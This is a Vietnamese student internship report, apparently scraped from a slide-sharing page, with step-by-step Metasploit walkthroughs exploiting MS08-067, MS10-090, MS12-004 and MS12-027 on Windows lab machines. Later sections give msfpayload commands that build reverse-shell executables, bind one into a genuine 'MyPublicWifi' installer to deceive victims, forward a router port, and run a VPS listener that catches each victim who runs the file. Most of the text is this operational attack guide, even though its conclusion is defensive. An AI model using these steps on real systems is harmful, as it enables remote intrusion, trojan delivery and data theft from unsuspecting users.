2.2.5.1. LỖI MS08_067.
21 
Đặt IP cho máy BackTrack và máy XP. Chắc chắn rằng 2 máy đã kết nối thông với nhau. 
Tại máy Backtrack,khởi động Metasploit bằng lệnh “msfconsole”. 
Sau đó gõ lệnh “search ms08_067” để tìm module lỗi trong metasploit.
22 
Sau khi tìm kiếm sẽ hiện ra đường dẫn của module. Ta gõ lệnh “use {đường dẫn}” để vào cấu hình module.
23 
Gõ lệnh “show options” để xem các thông tin cần thiết lập. 
Lần lượt cấu hình: 
- Set RHOST [ip máy xp] 
- Set payload winsows/meterpreter/reverse_tcp 
- Set Lhost [ip máy BackTrack]
24 
Sau đó gõ lệnh “Exploit” để bắt đầu quá trình khai thác. 
Sau khi máy BackTrack thông báo đã thiết lập được 1 sessions thì ta đã có thể làm chủ máy nạn nhân. 
- Gõ lệnh “getuid” để lấy thông tin Username. 
- Gõ lệnh “sysinfo” để xem thông tin máy nạn nhân. 
- Gõ lệnh “ shell” để bắt đầu xâm nhập vào máy nạn nhân. Lúc này ta đã có quyền tương đương user đang đăng nhập trên máy nạn nhân.
25 
Dấu nhắc lệnh tại cửa sổ console đứng tại “ C:WINDOWSSYSTEM32”. Sử dụng lệnh “md trung” để tạo 1 thư mục có tên “trung” trong thư mục “system32” trên máy XP.
26 
Và kết quả trong thư mục “system32” trong ổ đĩa “C” của máy xp đã có thư mục “trung” vừa tạo. 
Tới đây ta đã hoàn tất quá trình khai thác mã lỗi ms08_067. 
2.2.5.2. LỖI MS10_090. 
Dùng lệnh “ifconfig” để kiểm tra ip máy BackTrack. 
Tại máy XP, dùng lệnh “ipconfig” để kiểm tra ip.
27 
Trên máy BackTrack dùng lệnh “ping [ip máy XP]” để đảm bảo 2 máy đã kết nối thông với nhau. 
Gõ lệnh “msfconsole” để khởi động metasploit.
28 
Gõ lệnh “search ms10_090” để tìm kiếm module lỗi ms10_090.
29 
Sau khi có đường dẫn, dùng lệnh “use [đường dẫn của module]” để bắt đầu thiết lập thông số. 
Dùng lệnh “show options” để biết các thông tin cần thiết lập.
30 
Lần lượt thiết lập các thông số bằng các lệnh: 
- Set srvhost [ip máy backtrack] 
- Set lhost [ip máy backtrack] 
- Set payload windows/meterpreter/reverse_tcp 
Cuối cùng dùng lệnh “Exploit” để khởi động module.
31 
Lúc này tại máy Backtrack sẽ tạo ra 1 đường link. Nếu máy XP nhấp vào đường link này thì sẽ bị xâm nhập. 
Mở trình duyệt IE tại máy XP và truy cập vào đường link được tạo từ máy BackTrack.
32 
Lúc này máy BackTrack sẽ gửi mã độc tới máy XP. Và sau đó thực hiện 1 phiên kết nối để xâm nhập. 
Dùng lệnh “sessions” để xem thông tin phiên kết nối. 
Tiếp theo dùng lệnh “sessions –I [ID của session]” để bắt đầu xâm nhập.
33 
Tới đây ta đã hoàn tất quá trình xâm nhập. Bây giờ ta dùng các lệnh: 
- Sysinfo: để lấy thông tin máy nạn nhân ( ở đây là máy XP). 
- Getuid: để lấy thông tin Username. 
- Shell: xâm nhập vào máy nạn nhân. 
Thử kết quả bằng cách dùng lệnh “ md trung” để tạo 1 thư mục tên “trung” trên máy nạn nhân.
34 
Và kiểm tra trên màn hình máy XP đã có thư mục vừa tạo. 
2.2.5.3. LỖI MS12_004. 
Mã lỗi này khai thác lỗi của file MIDI trong IE. 
Trước tiên trên máy BackTrack dùng lệnh “ ifconfig” để kiểm tra địa chỉ IP. Sau đó dùng lệnh “ ping [IP máy XP]” để kiểm tra kết nối giữa máy BackTrack và máy XP đã thông với nhau.
35 
Sau đó dùng lệnh “msfconsole” để khởi động Metasploit. 
Dùng lệnh “ search ms12_004” để tìm module của mã lỗi.
36 
Sau khi hệ thống tìm ra đường dẫn của module mã lỗi ms12_004. Ta ghi nhớ đường dẫn sau đó dùng lệnh “use [đường dẫn]” để bắt đầu sử dụng.
37 
Dùng lệnh “Show options” để xem các thông tin cần thiết lập. 
Tiếp theo thiết lập các thông số cần thiết bằng các lệnh: 
- Set SRVHOST [ip máy Backtrack]. 
- Set LHOST [ip máy BackTrack]. 
- Set payload windows/meterpreter/reverse_tcp.
38 
Cuốt cùng gõ lệnh “ Exploit” để bắt đầu khai thác lỗi. 
Lúc này máy BackTrack sẽ tạo ra 1 đương link. Khi máy XP truy cập vào đường link này thì sẽ bị xâm nhập.
39 
Trên máy XP mở trình duyệt IE và truy cập vào đường link đó. 
Ngay lập tức máy BackTrac sẽ gửi các đoạn mã độc để xâm nhập dựa vào lỗ hổng.
40 
Khi máy Backtrack thông báo đã có 1 phiên kết nối thì lúc đó ta đã có thể xâm nhập vào máy nạn nhân. 
Dùng lệnh “sessions” để kiểm tra thông tin phiên kết nối.
41 
Tiếp theo dùng lệnh “session –I [ID của phiên kết nối]” để xâm nhập vào máy nạn nhân. 
Tới đây ta đã có thể làm chủ hệ thống của máy nạn nhân. 
- Dùng lệnh “getuid” để lấy thông tin Username. 
- Dùng lện “sysinfo” để xem thông tin máy nạn nhân. 
- Dùng lênh “shell” để xâm nhâp hệ thống.
42 
Thử tạo 1 thư mục có tên “trung” bằng lệnh “md trung”. 
Ngay lập tức trên màn hình máy XP sẽ có thư mục “trung”.
43 
Như vậy ta đã hoàn thành khai thác mã lỗi ms12_004. 
2.2.5.4. LỖI MS12_027. 
Lỗi MS12_027 là lỗi mà thông qua bộ công cụ Office hacker sẽ tấn công vào hệ thống và chiếm quyền điều khiển. Trong các phiên bản Office phổ biến (từ 2003, 2007, 2010) đều dính lỗ hổng này. 
Bắt đầu quá trình tấn công. Ta khởi động Metasploit bằng câu lệnh “msfconsole” trên Backtrack.
44 
Dùng lệnh “search ms12_027” để tìm module của mã lỗi trong Metasploit. 
Sau khi có đường dẫn của module. Dùng lệnh “ use [đường dẫn module]” để sử dụng.
45 
Gõ lệnh “ Show options” để xem những thuộc tính cần thiết lập. 
Cần tạo 1 file giả có định dạng *.doc để làm công cụ xâm nhập máy nạn nhân. 
Dùng lệnh “ Set filename [ten file].doc”.
46 
Tiếp đó lần lượt gõ lệnh: 
- “Set payload windows/meterpreter/reverse_tcp” : thiết lập payload của module. 
- “Set LHOST [ip máy Backtrack]” : Thiết lập ip máy lắng nghe. 
Sau đó gõ lệnh “Exploit” để hoàn thành việc thiết lập thông tin và tạo file giả.
47 
Máy Backtrack lúc này sẽ tạo ra file *.doc và thông báo đường dẫn file được tạo ra. 
Kế tiếp ta cần thiết lập 1 trình lắng nghe và điều khiển máy nạn nhân ( sau khi máy nạn nhân bị nhiễm mã độc trong file *.doc). 
Dùng lệnh “use exploit/multi/handler”.
48 
Sau đó thiết lập các thông số: 
- “Set payload windows/meterpreter/reverse_tcp” . 
- “Set LHOST [ip máy Backtrack]”. 
Sau đó dùng lệnh “Exploit” để bắt đầu lắng nghe và thiết lập phiên kết nối với máy nạn nhân để xâm nhập ngay khi máy nạn nhân bị nhiễm mã độc khi mở file *.doc . 
Tới đây đã hoàn tất việc thiết lập và triển khai xâm nhập. Giờ ta sẽ chờ máy nạn nhân bị
49 
nhiễm mã độc. Cách dễ nhất là đưa file *.doc lên trình duyệt web để nạn nhân tải về. 
Copy file *.doc được tạo vào thư mục /var/www . Mở console khác lênh gõ lệnh: 
“cp [đường dẫn tới file *.doc] /var/www”. 
Sau đó triển khai web server bằng lệnh. 
“/etc/init.d/apache 2 start”. 
Từ máy XP truy cập vào địa chỉ “ http://[ip máy backtrack]/[file .doc]” . 1 cửa sổ “ file download” hiện ra.
50 
Khi file *.doc được mở tại máy nạn nhân. Ngay lúc này máy Backtrack sẽ kết nối tới máy nạn nhân và bắt đầu xâm nhập. Khi có thông báo 1 session đã được thiết lập thì ta đã có thể chiểm quyền user đang đăng nhập trên máy nạn nhân.
51 
- Dùng lệnh “getuid” để lấy thông tin Username. 
- Dùng lện “sysinfo” để xem thông tin máy nạn nhân. 
- Dùng lênh “shell” để xâm nhâp hệ thống.
52 
Tạo 1 thư mục tên “trung” bằng lệnh “md trung”. 
Kiểm tra trên màn hình máy XP ta thấy thư mục vừa đươc tạo từ máy Backtrack. 
Tới đây ta đã kết thúc quá trình xâm nhập qua mã lỗi ms12_027. 
2.2.5.5. MỞ PORT TREN MODEM,TẤN CONG NGOAI MẠNG INTERNET.
53 
Đầu tiên dùng lệnh “ping” để kiểm tra kết nối internet. 
Sau đó dùng lệnh “msfpayload windows/shell_reverse_tcp LHOST=[ip mặt ngoài máy Backtrack] LPORT=[port sẽ mở trong modem] X > /tmp/[tên file].exe” để tạo 1 file shell (file thực thi). Sau này ta sẽ gửi file này cho nạn nhân để kết nối với máy nạn nhân. Trong hình dưới : 
Lhost=1.54.28.158 là ip mặt ngoài của máy Backtrack.( Vào trang whatismyip.com để xem ip này). 
Lport=4455 là port được chỉ định để lắng nghe phiên kết nối. Port này sẽ được mở trong modem internet và được trả về địa chỉ ip local của máy Backtrack. 
/tmp/MypublickWifi.exe là file shell ta tạo ra từ câu lệnh này có tên là “MypublicWifi” và được lưu ở đường dẫn /tmp. 
Dùng lệnh “ifconfig” để xem ip của máy BackTrack trong mạng Lan. Sau này khi mở port ta sẽ trỏ port đó về ip này.
54 
Đăng nhập vào modem từ trình duyệt web, vào mục Nat và mở port khi nãy ra đã chọn.
55 
Tiếp theo mở cửa sổ console khác và khởi động Metasploit bằng câu lệnh “msfconsole”. 
Sử dụng module multi/hander trong Metasploit để giữ kết nối. 
Gõ lệnh : “use exploit/multi/hander”. 
Lần lượt gõ các lệnh : 
- “Set payload windows/shell/reverse_tcp”: để chọn payload cho module. 
- “Set lhost [ip mặt ngoài máy BackTrack]” : Cấu hình ip lắng nghe nhận kết nối trên mạng. 
- “Set lport [port được mở]” : Cấu hình port lắng nghe. 
Dùng lệnh “Show options” để kiểm tra lại thông tin đã cấu hình.
56 
Tới đây ta dùng lệnh “exploit” để bắt đầu lắng nghe. 
Việc còn lại là chờ nạn nhân bị nhiễm mã độc khi chạy file shell ta đã tạo ra. Vấn đề là làm sao để nạn nhân thực thi file đó. File shell nằm trong đường dẫn “/tmp/mypublicwifi” mà khi nãy ta đã tạo.
57 
Ở đây ta ghép file “mypublicwifi.exe” do Backtrack tạo ra với 1 file setup của phần mềm phát wifi có tên “mypublicwifi.exe” thật sự khác. Việc này sẽ dễ đánh lừa được nạn nhân hơn. Khi ghép xong ta sẽ có 1 file setup của phần mềm mypublicwifi thật sự, tuy nhiên khi nạn nhân chạy file setup này cũng sẽ đồng thời chạy file do Backtrack tạo ra. Để ghép được ta có thể tham khảo trên mạng với từ khóa “bind two *.exe”.
58 
Khi nạn nhân chạy file setup này thì máy Backtrack lập tức sẽ tạo kết nối với máy nạn nhân. Khi có thông báo 1 sessions được thiết lập thì ta đã xâm nhập được vào máy nạn nhân. 
Thử tạo 1 thư mục trên ổ đĩa “C” của máy nạn nhân bằng lệnh : 
“Cd C: ” : Lệnh này đưa vị trí làm việc về ổ C. 
“mkdir Trung” : Lệnh này tạo thư mục tên Trung. 
Và kiểm tra trên máy nạn nhân :
59 
Tới đây ta kết thúc việc tấn công máy nạn nhân ngoài mạng internet bằng Metasploit qua việc tạo file shell chứa mã độc. 
2.2.5.6. CÀI ĐẶT METASPLOIT TREN VPS. SỬ DỤNG GIAO DIỆN WEB CỦA METASPLOIT KHAI THÁC MÃ LỖI MS10_090 TỪ VPS. 
Từ VPS tải phần mềm chương trình Metasploit từ web site http://metasploit.com. Cài đặt như các phần mềm khác. Chú ý tắt tường lửa và chương trình anti virut nếu có. 
Đăng nhập vào VPS, mở giao diện web của Metasploit Community. 
Chọn Start->program->metasploit->Access metasploit UI.
60 
Chọn project, ở đây mình để project default. 
Click Module ->search. 
Gõ vào ô tìm kiếm mã lỗi ms10_090. Sau đó click vào module hiện ra.
61 
Khai báo thông số srvhost là địa chỉ ip của VPS. Sau đó chọn Run module. 
Sau khi Module được chạy. Metasploit sẽ tạo ra 1 đường link. Khi victim truy cập đường link này thì sẽ bị xâm nhập.
62 
Kiểm tra tính thành công bằng cách từ 1 máy XP được kết nối internet. ta truy cập vào đường link trên. 
Ngay lập tức Metasloit sẽ gửi các kết nối tới Victim.
63 
Khi có thông báo 1 session đã được thiết lập là ta đã thành công. 
Ta đã có thể xâm nhập hoàn toàn vào máy victim. Xem,tải file,tạo file…làm gì tùy ý.
64 
Sau đây là 1 số hình ảnh xâm nhập vào máy victim. 
Truy cập ổ đĩa trên máy Victim. 
Tải dữ liệu trên máy Victim.
65 
Kết thúc module xâm nhập qua internet bằng mã lỗi ms10_090 với phần mềm Metasploit được cài đặt trên VPS. 
2.2.5.7. XÂM NHẬP WINDOWS 8 TỪ VPS. 
Cần chuẩn bị: 
- 1 máy Backtrack. 
- 1 VPS được cài sẵn Metasploit. 
Trên máy Backtrack. Tạo 1 file thực thi để gửi cho victim. Khi Victim chạy file này thì sẽ bị xâm nhập. 
Để tạo file shel gõ lệnh: 
Msfpayload windows/shell_reverse_tcp lhost=[IP VPS] lport=4455 X > /tmp/[ten file].exe. 
File shell này sẽ đc lưu tại đường dẫn /tmp.
66 
Sau đó đăng nhập vào VPS, khởi động metasploit và cấu hình metasploit về chế độ lắng nghe và giữ các kết nối. 
Gõ các lệnh: 
- Use exploit/multi/hander : Chuyển về chế độ lắng nghe. 
- Set payload windows/shell/reverse_tcp : Chọn payload. 
- Set lhost[ip VPS]: Cấu hình IP lắng nghe. 
- Set lport 4455: cấu hình port lắng nghe. 
Sau đó gõ lệnh Exploit để bắt đầu.
67 
Việc cần làm bây giờ là gửi file shell ban đầu tạo ở máy Backtrack cho Victim. Mỗi 1 victim chạy file shell thì VPS sẽ bắt được 1 kết nối để xâm nhập. 
Giờ ta sẽ cho máy windows 8 chạy file shell. 
Và ngay lập tức VPS sẽ bắt được kết nối và xâm nhập. 
Dùng lệnh mkdir Trung để tạo 1 thư mục có tên Trung trên màn hình máy windows 8.
68 
Kiểm tra trên màn hình máy windows 8 ta đã thấy thư mục Trung. 
Kết thúc module xâm nhập máy tính windwos 8 từ VPS.
69 
CHƯƠNG 3 : NHẬN XÉT- ĐÁNH GIÁ. 
3.1. ƯU ĐIỂM. 
Đề tài an ninh mạng giúp cho em hiểu quá trình tấn công, chúng ta cần phải làm những gì, phải chuẩn bị thu thập những thông tin như thế nào và từ đâu. Sau đó là quá trình tấn công vào hệ thống máy tính nạn nhân. Từ đó biết được cách thức cũng như quá trình hacker sẽ làm gì, qua đó chúng ta sẽ biết được cách phòng thủ và triển khai hệ thống an ninh mạng giúp cho hệ thống của ta an toàn trước những cuộc tấn công. 
3.2. KHUYẾT ĐIỂM. 
Đề tài này em mới được làm quen và tìm hiểu nên đối tượng để xâm nhập em vẫn dùng những hệ điều hành cũ như windows XP, Windows 7. Đến hiện nay Microsoft đã khai tử hệ điều hành XP nên những mã lỗi em thực hiện ở trên đã mất đi 1 phần nào ý nghĩa. Qua đó em thấy được sự rộng lớn của an ninh mạng. Phải thay đổi và cập nhật từng lúc. 
3.3. KẾT LUẬN. 
Trong quá trình nghiên cứu đề tài an ninh mạng em nhận thấy rằng đây là một trong những lĩnh vực rất đa dạng và phong phú và thật sự quan trọng, đặc biệt là vấn đề làm sao cho hệ thống máy tính hoạt động trơn tru, tránh được đe dọa những cuộc tấn công của hacker. Nó không những gây nguy hại đến người dùng mà đặc biệt là những doanh nghiệp, những tập đoàn, ngân hàng, tài chính. Quá trình tìm hiểu và nghiên cứu tại Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn hai tháng, và còn rất nhiều kiến thức khác liên quan em nhận thấy mình cần phải tiếp tục nỗ lực hơn nữa, nhưng đề tài an ninh mạng thật sự rất lôi cuốn và hấp dẫn đối với em. Kiến thức thực tiễn rất đa dạng và phong phú so với những gì em học được và nghiên cứu, em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em là trở thành chuyên gia an ninh mạng cao cấp.

More Related Content

What's hot

Báo cáo thực tập tốt nghiệp
Báo cáo thực tập tốt nghiệpBáo cáo thực tập tốt nghiệp
Báo cáo thực tập tốt nghiệpChung Thuận
 
Moodle võ tâm long k37.103.057
Moodle võ tâm long k37.103.057Moodle võ tâm long k37.103.057
Moodle võ tâm long k37.103.057Võ Tâm Long
 
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena kid zack
 
Nghiên cứu các kỹ thuật xử lý ảnh phục vụ việc nâng cao chất lượng nhận dạng ...
Nghiên cứu các kỹ thuật xử lý ảnh phục vụ việc nâng cao chất lượng nhận dạng ...Nghiên cứu các kỹ thuật xử lý ảnh phục vụ việc nâng cao chất lượng nhận dạng ...
Nghiên cứu các kỹ thuật xử lý ảnh phục vụ việc nâng cao chất lượng nhận dạng ...sunflower_micro
 
Ứng dụng android xây dựng hệ thống quản lý chi tiêu cho doanh nghiệp
Ứng dụng android xây dựng hệ thống quản lý chi tiêu cho doanh nghiệpỨng dụng android xây dựng hệ thống quản lý chi tiêu cho doanh nghiệp
Ứng dụng android xây dựng hệ thống quản lý chi tiêu cho doanh nghiệpnataliej4
 
Giao trinh lap rap cai dat may tinh new 2013
Giao trinh lap rap cai dat may tinh new 2013Giao trinh lap rap cai dat may tinh new 2013
Giao trinh lap rap cai dat may tinh new 2013Du Kenny
 
Bao cao tot nghiep
Bao cao tot nghiepBao cao tot nghiep
Bao cao tot nghiepcunghocnao89
 
Giáo trình lắp ráp và cài đặt máy tính
Giáo trình lắp ráp và cài đặt máy tínhGiáo trình lắp ráp và cài đặt máy tính
Giáo trình lắp ráp và cài đặt máy tínhjackjohn45
 
Quản lý quan hệ khách hàng
Quản lý quan hệ khách hàngQuản lý quan hệ khách hàng
Quản lý quan hệ khách hàngAn Nguyen
 
Ứng dụng smartcity tại thành phố Amsterdam (Hà Lan) và đề xuất giải pháp phân...
Ứng dụng smartcity tại thành phố Amsterdam (Hà Lan) và đề xuất giải pháp phân...Ứng dụng smartcity tại thành phố Amsterdam (Hà Lan) và đề xuất giải pháp phân...
Ứng dụng smartcity tại thành phố Amsterdam (Hà Lan) và đề xuất giải pháp phân...sunflower_micro
 
Đề tài: Nghiên cứu hành vi mua sắm trực tuyến của người tiêu dùng, HAY
Đề tài: Nghiên cứu hành vi mua sắm trực tuyến của người tiêu dùng, HAYĐề tài: Nghiên cứu hành vi mua sắm trực tuyến của người tiêu dùng, HAY
Đề tài: Nghiên cứu hành vi mua sắm trực tuyến của người tiêu dùng, HAYViết thuê trọn gói ZALO 0934573149
 
Nghiên cứu công nghệ mã vạch hai chiều và đề xuất dự án ứng dụng nghiệp vụ nh...
Nghiên cứu công nghệ mã vạch hai chiều và đề xuất dự án ứng dụng nghiệp vụ nh...Nghiên cứu công nghệ mã vạch hai chiều và đề xuất dự án ứng dụng nghiệp vụ nh...
Nghiên cứu công nghệ mã vạch hai chiều và đề xuất dự án ứng dụng nghiệp vụ nh...sunflower_micro
 
Luận văn Thạc sĩ tìm hiểu hoạt động các hệ thống năng lượng tái tạo và sơ đồ ...
Luận văn Thạc sĩ tìm hiểu hoạt động các hệ thống năng lượng tái tạo và sơ đồ ...Luận văn Thạc sĩ tìm hiểu hoạt động các hệ thống năng lượng tái tạo và sơ đồ ...
Luận văn Thạc sĩ tìm hiểu hoạt động các hệ thống năng lượng tái tạo và sơ đồ ...Dịch vụ viết thuê Luận Văn - ZALO 0932091562
 

What's hot (20)

luan van thac si xay dung chuong trinh quan ly vat tu
luan van thac si xay dung chuong trinh quan ly vat tuluan van thac si xay dung chuong trinh quan ly vat tu
luan van thac si xay dung chuong trinh quan ly vat tu
 
Luận văn: Ứng dụng công nghệ IoT cho giám sát môi trường, HAY
Luận văn: Ứng dụng công nghệ IoT cho giám sát môi trường, HAYLuận văn: Ứng dụng công nghệ IoT cho giám sát môi trường, HAY
Luận văn: Ứng dụng công nghệ IoT cho giám sát môi trường, HAY
 
Đề tài: Mô hình đếm, phân loại sản phẩm theo cân nặng màu sắc
Đề tài: Mô hình đếm, phân loại sản phẩm theo cân nặng màu sắcĐề tài: Mô hình đếm, phân loại sản phẩm theo cân nặng màu sắc
Đề tài: Mô hình đếm, phân loại sản phẩm theo cân nặng màu sắc
 
Báo cáo thực tập tốt nghiệp
Báo cáo thực tập tốt nghiệpBáo cáo thực tập tốt nghiệp
Báo cáo thực tập tốt nghiệp
 
Moodle võ tâm long k37.103.057
Moodle võ tâm long k37.103.057Moodle võ tâm long k37.103.057
Moodle võ tâm long k37.103.057
 
Luận án: Ngôn ngữ giới trẻ qua phương tiện truyền thông, HAY
Luận án: Ngôn ngữ giới trẻ qua phương tiện truyền thông, HAYLuận án: Ngôn ngữ giới trẻ qua phương tiện truyền thông, HAY
Luận án: Ngôn ngữ giới trẻ qua phương tiện truyền thông, HAY
 
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
 
Nghiên cứu các kỹ thuật xử lý ảnh phục vụ việc nâng cao chất lượng nhận dạng ...
Nghiên cứu các kỹ thuật xử lý ảnh phục vụ việc nâng cao chất lượng nhận dạng ...Nghiên cứu các kỹ thuật xử lý ảnh phục vụ việc nâng cao chất lượng nhận dạng ...
Nghiên cứu các kỹ thuật xử lý ảnh phục vụ việc nâng cao chất lượng nhận dạng ...
 
Ứng dụng android xây dựng hệ thống quản lý chi tiêu cho doanh nghiệp
Ứng dụng android xây dựng hệ thống quản lý chi tiêu cho doanh nghiệpỨng dụng android xây dựng hệ thống quản lý chi tiêu cho doanh nghiệp
Ứng dụng android xây dựng hệ thống quản lý chi tiêu cho doanh nghiệp
 
Nhân tố ảnh hưởng đến lựa chọn mạng di động của khách hàng
Nhân tố ảnh hưởng đến lựa chọn mạng di động của khách hàngNhân tố ảnh hưởng đến lựa chọn mạng di động của khách hàng
Nhân tố ảnh hưởng đến lựa chọn mạng di động của khách hàng
 
Giao trinh lap rap cai dat may tinh new 2013
Giao trinh lap rap cai dat may tinh new 2013Giao trinh lap rap cai dat may tinh new 2013
Giao trinh lap rap cai dat may tinh new 2013
 
Luận văn Thạc sĩ Xây dựng Website trường Cao đẳng Du lịch Hải Phòng
Luận văn Thạc sĩ Xây dựng Website trường Cao đẳng Du lịch Hải PhòngLuận văn Thạc sĩ Xây dựng Website trường Cao đẳng Du lịch Hải Phòng
Luận văn Thạc sĩ Xây dựng Website trường Cao đẳng Du lịch Hải Phòng
 
Bao cao tot nghiep
Bao cao tot nghiepBao cao tot nghiep
Bao cao tot nghiep
 
Giáo trình lắp ráp và cài đặt máy tính
Giáo trình lắp ráp và cài đặt máy tínhGiáo trình lắp ráp và cài đặt máy tính
Giáo trình lắp ráp và cài đặt máy tính
 
Quản lý quan hệ khách hàng
Quản lý quan hệ khách hàngQuản lý quan hệ khách hàng
Quản lý quan hệ khách hàng
 
Ứng dụng smartcity tại thành phố Amsterdam (Hà Lan) và đề xuất giải pháp phân...
Ứng dụng smartcity tại thành phố Amsterdam (Hà Lan) và đề xuất giải pháp phân...Ứng dụng smartcity tại thành phố Amsterdam (Hà Lan) và đề xuất giải pháp phân...
Ứng dụng smartcity tại thành phố Amsterdam (Hà Lan) và đề xuất giải pháp phân...
 
luan van thac si nghien cuu tac dong den moi truong cua nha may san xuat son
luan van thac si nghien cuu tac dong den moi truong cua nha may san xuat sonluan van thac si nghien cuu tac dong den moi truong cua nha may san xuat son
luan van thac si nghien cuu tac dong den moi truong cua nha may san xuat son
 
Đề tài: Nghiên cứu hành vi mua sắm trực tuyến của người tiêu dùng, HAY
Đề tài: Nghiên cứu hành vi mua sắm trực tuyến của người tiêu dùng, HAYĐề tài: Nghiên cứu hành vi mua sắm trực tuyến của người tiêu dùng, HAY
Đề tài: Nghiên cứu hành vi mua sắm trực tuyến của người tiêu dùng, HAY
 
Nghiên cứu công nghệ mã vạch hai chiều và đề xuất dự án ứng dụng nghiệp vụ nh...
Nghiên cứu công nghệ mã vạch hai chiều và đề xuất dự án ứng dụng nghiệp vụ nh...Nghiên cứu công nghệ mã vạch hai chiều và đề xuất dự án ứng dụng nghiệp vụ nh...
Nghiên cứu công nghệ mã vạch hai chiều và đề xuất dự án ứng dụng nghiệp vụ nh...
 
Luận văn Thạc sĩ tìm hiểu hoạt động các hệ thống năng lượng tái tạo và sơ đồ ...
Luận văn Thạc sĩ tìm hiểu hoạt động các hệ thống năng lượng tái tạo và sơ đồ ...Luận văn Thạc sĩ tìm hiểu hoạt động các hệ thống năng lượng tái tạo và sơ đồ ...
Luận văn Thạc sĩ tìm hiểu hoạt động các hệ thống năng lượng tái tạo và sơ đồ ...
 

Similar to Bao cao thuc tap athena

Luận Văn Kiểm Soát Rủi Ro Tuân Thủ Thuế Nghiên Cứu Trường Hợp Cục Thuế Tỉnh Đ...
Luận Văn Kiểm Soát Rủi Ro Tuân Thủ Thuế Nghiên Cứu Trường Hợp Cục Thuế Tỉnh Đ...Luận Văn Kiểm Soát Rủi Ro Tuân Thủ Thuế Nghiên Cứu Trường Hợp Cục Thuế Tỉnh Đ...
Luận Văn Kiểm Soát Rủi Ro Tuân Thủ Thuế Nghiên Cứu Trường Hợp Cục Thuế Tỉnh Đ...Viết Thuê Luận Văn Luanvanpanda.com
 
Đánh giá công tác đãi ngộ nhân sự từ góc độ người lao động tại nhà máy may
Đánh giá công tác đãi ngộ nhân sự từ góc độ người lao động tại nhà máy mayĐánh giá công tác đãi ngộ nhân sự từ góc độ người lao động tại nhà máy may
Đánh giá công tác đãi ngộ nhân sự từ góc độ người lao động tại nhà máy mayDịch vụ Làm Luận Văn 0936885877
 
Nguyen thi thu huong lop tc11.b1
Nguyen thi thu huong lop tc11.b1Nguyen thi thu huong lop tc11.b1
Nguyen thi thu huong lop tc11.b1TyDu6
 
Quản trị đào tạo nhân viên chăm sóc khách hàng tại công ty viettel_Nhan lam l...
Quản trị đào tạo nhân viên chăm sóc khách hàng tại công ty viettel_Nhan lam l...Quản trị đào tạo nhân viên chăm sóc khách hàng tại công ty viettel_Nhan lam l...
Quản trị đào tạo nhân viên chăm sóc khách hàng tại công ty viettel_Nhan lam l...Nguyễn Thị Thanh Tươi
 
QUẢN TRỊ ĐÀO TẠO TẠI VIETTEL
QUẢN TRỊ ĐÀO TẠO TẠI VIETTELQUẢN TRỊ ĐÀO TẠO TẠI VIETTEL
QUẢN TRỊ ĐÀO TẠO TẠI VIETTELPhuong Tran
 
BÁO CÁO THỰC TẬP - CUỐI KỲ
BÁO CÁO THỰC TẬP - CUỐI KỲBÁO CÁO THỰC TẬP - CUỐI KỲ
BÁO CÁO THỰC TẬP - CUỐI KỲkakawpah0911
 
Hệ thống thông tin kế toán tiền lương tại công ty TAFCO Hà Nội, 9đ - Gửi miễn...
Hệ thống thông tin kế toán tiền lương tại công ty TAFCO Hà Nội, 9đ - Gửi miễn...Hệ thống thông tin kế toán tiền lương tại công ty TAFCO Hà Nội, 9đ - Gửi miễn...
Hệ thống thông tin kế toán tiền lương tại công ty TAFCO Hà Nội, 9đ - Gửi miễn...Dịch vụ viết bài trọn gói ZALO: 0909232620
 
CẢI THIỆN CÔNG TÁC TUYỂN DỤNG LAO ĐỘNG TẠI CÔNG TY CỔ PHẦN TECHNO VIỆT NAM CO...
CẢI THIỆN CÔNG TÁC TUYỂN DỤNG LAO ĐỘNG TẠI CÔNG TY CỔ PHẦN TECHNO VIỆT NAM CO...CẢI THIỆN CÔNG TÁC TUYỂN DỤNG LAO ĐỘNG TẠI CÔNG TY CỔ PHẦN TECHNO VIỆT NAM CO...
CẢI THIỆN CÔNG TÁC TUYỂN DỤNG LAO ĐỘNG TẠI CÔNG TY CỔ PHẦN TECHNO VIỆT NAM CO...lamluanvan.net Viết thuê luận văn
 
Một số giải pháp nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty TN...
Một số giải pháp nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty TN...Một số giải pháp nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty TN...
Một số giải pháp nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty TN...Nhận Viết Đề Tài Trọn Gói ZALO 0932091562
 
Đề tài: Nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty Hoàng Gia Phát
Đề tài: Nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty Hoàng Gia PhátĐề tài: Nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty Hoàng Gia Phát
Đề tài: Nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty Hoàng Gia PhátViết thuê trọn gói ZALO 0934573149
 
Đề tài Khóa luận 2024 Thực trạng quy trình kiểm toán khoản mục Doanh thu bán...
Đề tài Khóa luận 2024  Thực trạng quy trình kiểm toán khoản mục Doanh thu bán...Đề tài Khóa luận 2024  Thực trạng quy trình kiểm toán khoản mục Doanh thu bán...
Đề tài Khóa luận 2024 Thực trạng quy trình kiểm toán khoản mục Doanh thu bán...lamluanvan.net Viết thuê luận văn
 
PTTKHT_UML_Tham khảo.doc
PTTKHT_UML_Tham khảo.docPTTKHT_UML_Tham khảo.doc
PTTKHT_UML_Tham khảo.docThiMinhPhm2
 
Đề tài luận văn 2024 Tạo động lực cho người lao động tại Công ty Cổ phần môi ...
Đề tài luận văn 2024 Tạo động lực cho người lao động tại Công ty Cổ phần môi ...Đề tài luận văn 2024 Tạo động lực cho người lao động tại Công ty Cổ phần môi ...
Đề tài luận văn 2024 Tạo động lực cho người lao động tại Công ty Cổ phần môi ...lamluanvan.net Viết thuê luận văn
 
Xây dựng chiến lược cho công ty trách nhiệm hữu hạn lan phố sdt/ ZALO 09345 4...
